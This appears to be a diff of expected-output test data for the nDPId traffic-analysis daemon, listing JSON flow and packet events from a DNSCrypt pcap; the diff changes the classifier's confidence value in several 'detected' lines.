00697{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":946739304626,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":946739304626,"pkt":"ZmZmZmZmRERERERECABFAADPni1AADcRISDR+vEZCgAAAQG7gBkAu2Pi8VmBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAfYAKepZwtScVP1uN5sT5N32akeuKSAV4oXU5Dhs9DYGIJJAdGKfXtNXiElvsQvm00KyC1gH3yBcsV0UHMhcHDXsbONUID12Y3+IJuxI0oT3pvizj3NQWIv0z50xYMyIaexs41QgPXZgAAAABX1N8A19UzYM="} 
@@ -147,55 +147,55 @@ 00697{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":946739304628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":946739304628,"pkt":"ZmZmZmZmRERERERECABFAADPni9AADcRIR7R+vEZCgAAAQG7kQMAu1L78VaBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAfYAKepZwtScVP1uN5sT5N32akeuKSAV4oXU5Dhs9DYGIJJAdGKfXtNXiElvsQvm00KyC1gH3yBcsV0UHMhcHDXsbONUID12Y3+IJuxI0oT3pvizj3NQWIv0z50xYMyIaexs41QgPXZgAAAABX1N8A19UzYM="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43609,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":946739304628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAAXcpRkgAL0RA98KAAABKU9FDapZAbsGBIt\/BsABAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43609,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43609,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":46229,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":946739304628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAAXcpRogAL0RA94KAAABKU9FDbSVAbsGBIFBBsIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":46229,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":46229,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":72,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304628} 00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":72,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAABQpRkAub0RKLIKAAABKU9FDQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":73,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304628} 00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":73,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAABQpRoAub0RKLEKAAABKU9FDQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56043,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":946739304628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAAXcpRsgAL0RA90KAAABKU9FDdrrAbsGBFrpBsQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56043,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56043,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":38136,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":946739304628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAAIcpRxAAL0R55sKAAABKU9FDZT4AbsCCDEyBsMBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":38136,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":38136,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":76,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304628} 00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":76,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAABQpRsAub0RKLAKAAABKU9FDQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56177,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":946739304628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAAIcpR1AAL0R55oKAAABKU9FDdtxAbsCCDEyBsEBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA